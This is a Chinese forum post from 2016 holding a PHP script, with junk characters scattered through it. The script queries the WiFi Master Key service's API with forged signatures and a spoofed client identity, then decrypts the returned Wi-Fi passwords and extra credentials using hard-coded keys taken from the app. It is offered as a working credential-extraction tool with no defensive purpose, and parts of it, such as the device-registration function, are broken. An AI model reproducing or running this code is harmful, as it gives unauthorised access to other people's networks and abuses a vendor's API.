上尉
- 注册时间
- 2010-7-6
- 金币
- 1189 个
- 威望
- 18 个
- 荣誉
- 0 个
尚未签到
|
<form action="" method="post">
' D5 F2 M% ^ |; t1 g <p>ssid: <input type="text" name="ssid" /></p>1 y" _/ F0 r- ~" ~6 ~6 y
<p>bssid: <input type="text" name="bssid" /></p>$ J3 T H" V* k( O
<input type="submit" value="提交" />$ ^7 H9 |* B1 l2 |5 [3 i
</form>$ F" |" l( ]& l6 R6 I6 `# }' |: o3 j+ z
' Y4 X5 N+ e' T8 _+ g8 k# y<?php: k7 L1 J. ~4 A3 g6 d' Q0 X: {
$bssid = $_POST["bssid"] ;
% @ u3 R, f5 Z) g! X) b$ssid = $_POST["ssid"] ;6 w& H! z1 A1 Q4 w3 i, g
if (isset( $bssid ) && isset( $ssid )){
, p |# p( R* A, |; @//update salt
5 |% h3 l9 T9 o3 e3 i5 ]. X $ret = request( $bssid , $ssid , md5(rand(1, 10000)));
) z& G5 |+ f; F! P $ret = json_decode( $ret );
8 ]& _9 m' L3 W- k5 s S $ret = request( $bssid , $ssid , $ret ->retSn);
7 t3 C" @, s. c5 @+ E. @3 s $ret = json_decode( $ret );
) f* Q! {+ |+ O if ( $ret ->retCd == 0){
. ]8 [4 R3 b0 L% ? R if ( $ret ->qryapwd->retCd == 0){6 k2 u( E0 d; w: d4 z4 S
$list = $ret ->qryapwd->psws;+ G$ b: _! o. }0 a N
foreach ( $list as $wifi ){& r/ x1 G5 ~5 T( n0 N3 F
echo 'SSID: ' . $wifi ->ssid. "<br>" ;+ {9 y5 Q1 E7 e
echo 'PWD: ' .decryptStrin( $wifi ->pwd). "<br>" ; Q% t! F: j% J/ O' u/ t
echo 'BSSID: ' . $wifi ->bssid. "<br>" ;
$ X: A2 t, Y1 o7 {* ` if ( $wifi ->xUser){$ |- m6 A+ ~/ a' s/ h
echo 'xUser: ' . $wifi ->xUser. "<br>" ;2 {: y' c+ c6 I" ]7 @$ \. _
echo 'xPwd: ' . $wifi ->xPwd. "<br>" ;6 i/ e) @# ]; m
}0 B2 A6 D6 F* E/ u- s
}& v( f4 T) z+ O! L q8 t& z- A
}
" k$ ?2 S0 e$ h/ J else {
4 b+ m5 f. d C9 H echo $ret ->qryapwd->retMsg;5 s3 T; h# q4 N+ I5 s$ l0 b9 g' ]: D: S& ~
}3 m" y/ ^( h( r
}2 T" R& c0 |! U7 V) x- b
}) {& G; n2 \. F+ |$ Z. x1 r
function request( $bssid , $ssid , $salt , $dhid = 'ff8080814cc5798a014ccbbdfa375369' ){0 b+ D. e: ?9 O0 I0 F
$data = array ();
* a/ C( d! j& {4 u $data [ 'appid' ] = '0008' ;; n& o9 K( w# ]9 T6 v- S6 J
$data [ 'bssid' ] = $bssid ;$ T' G- `7 Q: |# ~* u! B p
$data [ 'chanid' ] = 'gw' ;
0 p$ X6 ~* E" b1 _5 K $data [ 'dhid' ] = $dhid ;
7 W4 L' Z- O$ V) O1 M* W; f $data [ 'ii' ] = '609537f302fc6c32907a935fb4bf7ac4' ;
: J( D! N) n3 M $data [ 'lang' ] = 'cn' ;
6 Q# f2 T. D4 v& M) t, z# L $data [ 'mac' ] = '60f81dad28dh' ;8 M! _$ k5 p8 g3 n3 f! e1 d
$data [ 'method' ] = 'getDeepSecChkSwitch' ;
t8 Y3 c. a3 a8 B $data [ 'pid' ] = 'qryapwd:commonswitch' ;
! J( t+ C) z2 y, Y6 ]) R8 t0 r8 s $data [ 'ssid' ] = $ssid ;
* r1 X8 X- p5 [. x& {$ s $data [ 'st' ] = 'm' ;" y7 m X7 {6 ~2 G, S
$data [ 'uhid' ] = 'a0000000000000000000000000000002' ;$ ]: R8 t0 w6 q
$data [ 'v' ] = '324' ;
, I. d" ^1 I: t, x! I' Z, Q $data [ 'sign' ] = sign( $data , $salt );
, h2 A6 Z" g* F3 I& P& C $curl = curl_init();
3 r* @9 P/ n+ B: p8 O curl_setopt( $curl , CURLOPT_URL, 'http://wifiapi02.51y5.net/wifiapi/fa.cmd' );
% e$ m W4 s" a2 l* K! q; l# i+ | curl_setopt( $curl , CURLOPT_USERAGENT, 'WiFiMasterKey/1.1.0 (Mac OS X Version 10.10.3 (Build 14D136))' );
: o; d1 l# \5 b3 F e# x. d l* A curl_setopt( $curl , CURLOPT_SSL_VERIFYPEER, false); // stop verifying certificate
; @6 }( K- s+ n' | curl_setopt( $curl , CURLOPT_RETURNTRANSFER, true);( @ L$ v: A$ \; Q- a; y/ c3 d
curl_setopt( $curl , CURLOPT_POST, true); // enable posting
; c: Q. @+ O8 v+ z9 }1 c- ]0 H curl_setopt( $curl , CURLOPT_POSTFIELDS, http_build_query( $data )); // post images
# y. X+ E3 ?/ P( U7 _ curl_setopt( $curl , CURLOPT_FOLLOWLOCATION, true); // if any redirection after upload* s/ l- K6 t c3 z$ j
$r = curl_exec( $curl );
- R2 C$ X! V( [0 U3 H( J4 U curl_close( $curl );$ j. `4 x* R1 D& z; P! `
return $r ;
0 K, c& F& r0 ^) j4 F4 i* M5 ~}- B. y& E; p( V" Q4 v
function registerNewDevice(){
' e# R1 a& @4 a' J# A $salt = '1Hf%5Yh&7Og$1Wh!6Vr&7Rs!3vj#1Aa$' ;
& p9 e2 N& x1 K6 q $data = array ();
) w! H! E2 W3 W9 ? $data [ 'appid' ] = '0008' ;# A! |0 I' P) S- B! F
$data [ 'bssid' ] = $bssid ;/ z: H, ^7 _$ L4 {1 U8 K
$data [ 'chanid' ] = 'gw' ;
2 Z3 K1 X% N7 _% @& ?/ G $data [ 'dhid' ] = $dhid ;
6 Y& T- C& u* x! [8 g $data [ 'ii' ] = '609537f302fc6c32907a935fb4bf7ac9' ;
9 ^- y, w* y3 ~- \% h& i $data [ 'lang' ] = 'cn' ;. G! F, Y* Q% I# g/ k" @( H: x
$data [ 'mac' ] = '60f81dad28de' ;
% B, t8 H- g4 ?5 U* y $data [ 'method' ] = 'getDeepSecChkSwitch' ;/ p$ q6 h$ e5 M, J
$data [ 'pid' ] = 'qryapwd:commonswitch' ;( e Y. h% m t/ w
$data [ 'ssid' ] = $ssid ;6 x) p) i6 l1 f3 ?& l5 C
$data [ 'st' ] = 'm' ;7 ~. [7 A: ^0 [$ D g
$data [ 'uhid' ] = 'a0000000000000000000000000000001' ;" s( u' G# x, G$ E. N
$data [ 'v' ] = '324' ;
: C1 k0 r& _' N& o0 o- h0 ~, u $data [ 'sign' ] = sign( $data , $salt );4 K: m3 M; B* e" o. ~
}
4 U F# m4 D9 z% e! e. n0 B' yfunction sign( $array , $salt ){
/ S3 B9 g& g& I0 z, |( M // 签名算法
7 w( x/ g$ l t, G$ a* q $request_str = '' ;
3 g2 T! j2 a- R# v2 l // 对应apk中的 Arrays.sort 数组排序,测试PHP需用 ksort
( J! l" J4 j- c; g% [' m U5 P3 d ksort( $array );1 @+ t9 V3 H- V4 O- l
foreach ( $array as $key => $value ) {' U4 e; a, `, l- B" ]
$request_str .= $value ;* F- S% Q* U' ~9 y* B
}( r, j( y6 L! ]6 x1 E% @
$sign = md5( $request_str . $salt );
) W% \! I: s5 P6 Q$ i% l8 G return strtoupper ( $sign );
0 T6 b, I1 v m5 i0 W}
_* G' ~- x9 T# _ Mfunction decryptStrin( $str , $keys = 'k%7Ve#8Ie!5Fb&8E' , $iv = 'y!0Oe#2Wj#6Pw!3V' , $cipher_alg =MCRYPT_RIJNDAEL_128){; a# o9 s/ |/ g3 h* c
//Wi-Fi万能钥匙密码采用 AES/CBC/NoPadding 方式加密
, l- m% ~7 i! \; h3 [/ H0 n //[length][password][timestamp]$ M2 n3 x7 E8 z+ O- `
$decrypted_string = mcrypt_decrypt( $cipher_alg , $keys , pack( "H*" , $str ),MCRYPT_MODE_CBC, $iv );
/ X2 P+ P# \; c% u return substr (trim( $decrypted_string ),3,-13);7 N" x$ K* K" ]+ y8 E5 j( p
} ?> |
评分
-
1
查看全部评分
-
|
[复制链接]
IP卡
狗仔卡
发表于 2016-8-22 03:03
显身卡
